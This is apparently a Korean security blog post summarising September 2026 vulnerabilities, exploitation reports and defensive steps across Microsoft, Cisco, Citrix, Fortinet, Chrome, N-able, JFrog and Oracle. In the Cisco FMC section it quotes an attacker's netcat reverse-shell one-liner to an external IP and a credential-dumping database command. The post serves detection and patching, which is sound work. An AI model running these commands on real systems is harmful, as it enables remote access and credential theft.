본문 바로가기
Linux/보안

2026년 9월 최근 취약점 사례

by 데브믹서 2026. 9. 18.



1. 개요

  • 2026년 9월은 단일 월 기준 역대 최대 규모의 패치가 집중된 기간으로 확인됨
  • Microsoft 9월 Patch Tuesday에서 964개(CVE 기준) ~ 999개(벤더 집계 기준) 취약점이 수정되었으며, 그 중 2건은 제로데이로 야생 악용이 확인됨
  • Oracle September CSPU에서 673개 패치, 672개 고유 CVE, 번들 포함 800개 이상 취약점이 해소되었으며 CVSS 10.0 취약점이 6건 포함됨
  • CISA KEV에 9월 8일~9일 사이 총 5건이 신규 등록됨
    • CVE-2026-86218 (N-able N-central, CVSS 10.0) - 마감 9/11
    • CVE-2026-20079 (Cisco FMC, CVSS 10.0), CVE-2026-19490 (Citrix NetScaler, CVSS 9.3), CVE-2025-25249 (Fortinet, CVSS 9.8), CVE-2026-87491 (Chrome V8, CVSS 8.8) - 마감 9/12
  • 경계 장비, RMM, 빌드 인프라에서 CVSS 9.8~10.0 취약점이 동시에 발생하고, 브라우저와 OS 취약점을 묶은 체인형 공격(BlueMoon)이 확인된 것이 특징임

2. 타임라인

  • 8/28 JFrog Artifactory CVE-2026-82329 공개 및 고정 버전 6개 브랜치 배포
  • 9/3 Chrome V8 CVE-2026-85046 고정 버전 배포, 제로데이로 확인
  • 9/5 N-able N-central 2026.3 Hotfix 4 배포, CVE-2026-86218 수정
  • 9/8 Microsoft Patch Tuesday 배포, CVE-2026-81963 / CVE-2026-85880 제로데이 포함
  • 9/8 CISA KEV에 CVE-2026-86218 등록
  • 9/9 CISA KEV에 4건 추가 등록, Cisco Talos FMC 악용 클러스터 3개 공개
  • 9/11 Proofpoint BlueMoon 익스플로잇 체인 공개
  • 9/16 Oracle September CSPU 공개

3. Microsoft Patch Tuesday

3.1 통계

  • Tenable 기준: 104개 Critical, 860개 Important, 총 964개
  • Rapid7 기준: Microsoft 자체 974개 + 서드파티 25개 = 999개로 집계, Windows 단독 723개 차지
  • 유형별 비중: EoP 44.7%, RCE 26.8%

3.2 CVE-2026-81963 - Windows Update Stack EoP

  • 기본 정보
    • CVSS 7.8 / Important / CWE-59 Link Following
    • 영향: Windows 11, Windows Server 2025 전 계열
    • 고정: 9월 누적 업데이트
  • 상세
    • Windows Update Stack이 임시 디렉터리에 파일을 생성한 뒤 SYSTEM 권한으로 이동시키는 과정에서 심볼릭 링크 및 마운트 포인트 검증을 누락하는 취약점
    • 공격자가 Temp 경로에 심볼릭 링크를 생성해 Update Stack이 임의 위치에 SYSTEM 권한으로 파일을 쓰도록 유도 가능
    • 2022년 이후 동일 컴포넌트에서 7건 패치되었으나 야생 악용은 이번이 최초 사례로 확인됨
  • 대응
    • 9월 누적 업데이트 적용
    • MoUsoCoreWorker.exe, TiWorker.exe의 Temp → System32 파일 이동 패턴 모니터링

3.3 CVE-2026-85880 - Windows ALPC EoP

  • 기본 정보
    • CVSS 7.8 / Important / CWE-122 Heap-based Buffer Overflow
    • 영향: Windows 10, 11, Server 2012~2025
    • 고정: 9월 누적 업데이트
  • 상세
    • ALPC(Advanced Local Procedure Call)는 커널 IPC 경로 중 가장 낮은 레벨에 위치하는 통신 메커니즘
    • 낮은 권한 AppContainer 프로세스가 ALPC 메시지를 통해 커널에 데이터를 전달할 때 길이 검증 부족으로 힙 오버플로우 발생, SYSTEM 권한 획득 가능
    • 2022년 이후 16건 패치, 2023년 4월 이후 3년 만의 ALPC 패치, CVE-2023-21674 이후 두 번째 제로데이 사례
  • 연관성
    • BlueMoon 체인의 최종 권한 상승 단계로 사용됨
    • CrowdStrike는 ALPC 취약점이 로컬 코드 실행만 있으면 신뢰할 수 있는 권한 상승 프리미티브가 된다고 평가

3.4 기타 주요 Microsoft 취약점

  • CVE-2026-69730 - Windows DNS Server RCE
    • CVSS 9.8 / Critical / use-after-free
    • 인증 없는 원격 공격자가 조작된 패킷으로 RCE 가능, Exploitation More Likely 평가
    • 외부 노출 DNS 보유 시 최우선 패치 대상
  • CVE-2026-69525 - Remote Desktop Services RCE
    • CVSS 9.8 / use-after-free
    • 관련 4건(CVE-2026-69514 CVSS 7.5, CVE-2026-69539 CVSS 7.5, CVE-2026-69599 CVSS 7.5, CVE-2026-69536 CVSS 7.1) 함께 패치됨
  • CVE-2026-69676 - Windows Kerberos RCE
    • CVSS 8.8 / Critical / capture-replay를 통한 인증 우회 및 코드 실행

4. CISA KEV 신규 등록 취약점

4.1 CVE-2026-20079 - Cisco Secure Firewall Management Center

  • 기본 정보
    • CVSS 10.0 / CWE-288 Authentication Bypass Using an Alternate Path
    • 영향: FMC Software 웹 인터페이스
    • 원인: 부팅 시 생성되는 부적절한 시스템 프로세스, 조작된 HTTP 요청으로 인증 우회 및 스크립트 실행 가능
    • 결과: OS root 권한 획득
  • 악용 현황 - Talos 3개 클러스터 공개
    • Cluster 1 UAT-12197
      • home.jsp 웹쉘을 CSM Tomcat webroot에 배치, 파라미터 F6C1F0E7 Base64 디코드 방식
      • cmd.jar로 OmniQuery.pl -db mdb -e 'SELECT name, auth_data FROM users;' 실행해 자격 증명 탈취
      • IOC: home.jsp 해시 B037f45e02a289325a1a5eb0d4db6a9fce9954fd0fdfd07162cb4eb2acbef77d
    • Cluster 2 UAT-11823 (Sandworm 연관)
      • CVE-2026-20079 + CVE-2026-20316(저권한 로그인, CVSS 5.3) 조합 사용
      • /var/tmp/license.tmp를 Makeself 패키지로 위장, package_info.pl로 root 실행
      • 내부에 Netcat 리버스쉘 포함: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208.123.119.215 3090 >/tmp/f
      • Cyclops Blink ELF 모듈러 임플란트 배포 - DoH IP 해석, /etc/init.d 영구화, 자격 증명 수집, 패킷 스니핑 기능
    • Cluster 3 UAT-11988 (Qilin 랜섬웨어)
      • 정적 자격 증명으로 로그인 후 package_info.pl LOTL 남용
      • 수집 항목: AD 계정, MySQL 자격 증명, 도메인 컨트롤러/IP 매핑, 파일 서버 목록
      • SOCKS5 프록시(socks5.py) + 리버스 SSH 터널로 389/636/88/445/5985 포워딩, Qilin 배포
  • 탐지 및 대응
    • /var/tmp/license.tmp 존재 여부 확인이 핵심 탐지 포인트
    • Snort SID 66075-66080, 66883 적용
    • 핫픽스 적용 후 9월 14일 주간 하드닝 릴리즈 적용 필요
  • 관련 CVE
    • CVE-2026-20316: CVSS 5.3, 정적 자격 증명으로 저권한 로그인 가능
    • CVE-2026-20131: CVSS 9.8, Java 역직렬화 RCE

4.2 CVE-2026-19490 - Citrix NetScaler ADC/Gateway

  • 기본 정보
    • CVSS 9.3 / CWE-288
    • 영향: Gateway(SSL VPN, ICA Proxy, CVPN, RDP Proxy) 또는 AAA 가상 서버로 구성된 경우만 해당
    • 원인: SAML HTTP-Redirect 바인딩을 통한 인증 우회
  • 악용 현황
    • Previdian 허니팟에서 9월 3일부터 56회 시도, 9월 8일 하루 36회 탐지
    • 6개 IP(호주, 독일, 일본, 미국)에서 출발
  • 대응
    • CTX696939 고정 빌드로 업그레이드 (14.1-47.46 이상, 13.1-59.19 이상 등 브랜치별)
    • Gateway/AAA 설정 보유 여부 먼저 확인

4.3 CVE-2025-25249 - Fortinet FortiOS

  • 기본 정보
    • CVSS: 초기 7.4에서 9.8로 재분류 (NHS England 공지)
    • CWE: CWE-122 Heap-based Buffer Overflow
    • 영향: FortiOS, FortiSwitchManager, FortiSASE - cw_acd 데몬(UDP 5246)
    • 원인: CAPWAP 요청 처리 중 힙 오버플로우로 인증 없이 RCE 가능
  • 악용 현황 - PivotC2 RAT
    • SOCRadar 분석: 7월부터 악용 시작
    • Node.js 기반 RAT PivotC2 드랍 - TLS 아웃바운드 C2, 인터랙티브 쉘, 파일 전송, SOCKS5/HTTP 터널링, CIDR 스캔, FortiGate 설정 수집 및 자격 증명 복호화 기능
    • 3,000개 IP 스캔, 178대 감염, 미국 집중
  • 대응
    • UDP 5246 외부 노출 제거
    • FG-IR-25-084 패치 적용
    • FortiGate에서 Node.js 프로세스 실행 여부 모니터링 및 자격 증명 교체

4.4 Chrome V8

  • CVE-2026-87491 - Out of Bounds Write
    • CVSS 8.8, Chrome 153.0.8010.36 이전 영향
    • 조작된 HTML로 샌드박스 내 코드 실행 가능, 2026년 7번째 제로데이
  • CVE-2026-85046 - Type Confusion
    • CVSS 8.8, Chromium 기반 브라우저 전체 영향
    • 8월 4일 제보, 8월 7일 Chromium 커밋에 패치, 9월 3일 Stable 배포 - 4주간 패치 갭 존재
    • 해당 갭 기간 동안 공격자가 리버스 엔지니어링해 0-day로 활용

5. N-able N-central CVE-2026-86218

  • 기본 정보
    • CVSS 10.0 / CWE-96 Static Code Injection / 사전인증 RCE
    • 영향: N-central 2026.3.1.14 이전 전 버전
    • 고정: 2026.3 Hotfix 4(2026.3.1.14)
  • 타임라인
    • 9/5 08:11 UTC: HF3(2026.3.1.13) 배포 - CVE-2026-86206/86207 수정
    • 9/5 16시경: Discord MSPGeek 채널 통해 제3의 연구자가 CVE-2026-86218 제로데이 제보
    • 9/6 00시경: HF4 긴급 배포, 5주 동안 4번째 핫픽스
    • 9/8: CISA KEV 등록, 마감 9/11
  • 위험성
    • N-central은 MSP가 고객사 수천 곳을 관리하는 RMM 플랫폼으로, 인터넷 노출 인스턴스 약 1,500개 추정
    • 단일 인스턴스 침해 시 하위 고객사 전체가 연쇄 위험에 노출되는 구조
    • Huntress는 fully patched 환경에서도 침해 조사 진행 중으로 밝힘
  • 대응
    • 온프레미스 HF4 즉시 적용, 클라우드는 N-able 자동 패치 완료
    • N-central 로그에서 인증 없는 API 호출 및 비정상 프로세스 생성 여부 확인

6. JFrog Artifactory CVE-2026-82329

  • 기본 정보
    • CVSS 9.8 / CWE-287 Improper Authentication
    • 영향: 셀프 호스팅 Artifactory, Cloud는 자동 패치
    • 고정: 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38, 7.161.20
  • 원인 분석 - Bishop Fox
    • JFrog Access가 클러스터 조인 키 설정 문자열을 콤마로 split하면서 빈 항목 필터링을 누락
    • 기본 설치에서는 설정값이 비어 있어 빈 문자열이 신뢰할 수 있는 조인 키로 등록됨
    • 빈 키의 서명 시크릿은 누구나 유도 가능하므로 인증 없이 조인 요청 한 번으로 관리자 범위 토큰 발급 가능
  • 악용
    • Fastly 관측: 공개 후 수일 만에 저수준 프로빙에서 대규모 스캔으로 급증
    • Wiz 보고: 8/15~9/8 기간 CVE-2026-42016(8.1), CVE-2026-42018(7.5)과 체인으로 관리자 권한 탈취 후 Rust 백도어 배포
  • 대응
    • 고정 버전으로 업그레이드
    • 임시 완화: system.yaml에 shared.security.additionalJoinKeys에 랜덤 값 설정
    • 8월 28일 이후 발급된 토큰 전수 폐기 및 access.log에서 /join 엔드포인트 200 응답 조사

7. Oracle September CSPU

  • 통계
    • 673개 신규 패치, 672개 고유 CVE, 번들 포함 800개 이상 해소
    • 17개 제품군에 분포, 100개 이상 Critical
  • CVSS 10.0 6건
    • CVE-2026-71133 Oracle Access Manager Authentication Engine
    • CVE-2026-83099 Oracle Forms
    • CVE-2026-83059 Oracle Internet Directory OID LDAP Server
    • CVE-2026-83020 Oracle Platform Security for Java
    • CVE-2026-83021 Oracle WebLogic Server Web Container
    • CVE-2026-87230 Oracle Hyperion Financial Management Security
    • Fusion Middleware에서만 153개 패치, 그 중 78개가 인증 없이 원격 익스플로잇 가능, 13개는 CVSS 9.9로 확인됨
  • 기타
    • CVE-2026-21962 Oracle HTTP Server 및 WebLogic Proxy Plug-in CVSS 10.0 - 8월 CISA KEV 등록, 야생 악용 중
    • CVE-2026-64849 RCE - Hong Kong GovCERT가 PoC 공개와 함께 야생 악용 경고

8. BlueMoon 익스플로잇 체인

  • 구성
    • 1단계: CVE-2026-85046 V8 타입 혼동으로 RCE, 렌더러 장악
    • 2단계: CVE-2026-87491 V8 샌드박스 탈출, 브로커 장악
    • 3단계: CVE-2026-85880 ALPC 권한 상승, SYSTEM 획득
  • 특징
    • 패치 갭 무기화: Chromium 커밋 공개 → Stable 배포까지 2~4주 간격 존재, 해당 기간 리버스 엔지니어링해 0-day로 활용
    • 빠른 확산: TA412가 8/28 최초 사용, 9월 초 중국 연계 3개 조직 + 미귀속 1개 조직이 동일 키트 사용
    • AI 가속: 패치 diff 분석 자동화로 무기화 속도 증가

9. 탐지 및 대응

  • 자산 식별
    • Shodan/Censys 검색: product:"N-central", product:"JFrog Artifactory", port:5246, title:"Citrix Gateway"
    • 내부 인벤토리: opatch lsinventory로 Oracle 제품 확인
  • 패치 우선순위
    • P0(당일): CISA KEV 5건 + JFrog 9.8 + Oracle 10.0 6건 - 인터넷 노출 + 야생 악용 확인
    • P1(3일): Windows DNS 9.8, RDP 9.8, Chrome 최신 버전
    • P2(7일): Windows EoP 2건 포함 나머지 Critical
    • P3(30일): Important 860개 단계적 배포
  • 탐지 쿼리
    • Windows: MoUsoCoreWorker.exe의 Temp → System32 파일 이동, Chrome 렌더러 자식 프로세스로 cmd.exe 생성 모니터링
    • Cisco FMC: /var/tmp/license.tmp 존재 여부, Snort SID 66075-66080
    • Fortinet: diag sys udp6 list로 UDP 5246 외부 바인딩 확인
    • JFrog: access.log에서 8/28 이후 /join 200 응답 조사
  • 자격 증명 관리
    • FMC, NetScaler, FortiGate, Artifactory, N-central 관리자 비밀번호 및 API 토큰 전수 교체 필요 - PivotC2, Cyclops Blink는 설정 파일 및 자격 증명을 수집함

10. 요약

  • 9월 취약점의 핵심은 단일 취약점이 아니라 체인형 공격으로 연결된다는 점임
  • 경계 장비(FMC, NetScaler, FortiGate, Artifactory)는 로깅이 약하고 패치가 늦어 공격자가 선호하는 경로
  • RMM(N-able)은 단일 침해가 공급망 전체로 확산되는 구조적 리스크를 보유
  • 패치 갭은 새로운 0-day 마켓으로 작용하며, 오픈소스 커밋 공개 → Stable 배포 간격을 줄이는 것이 방어 전략이 됨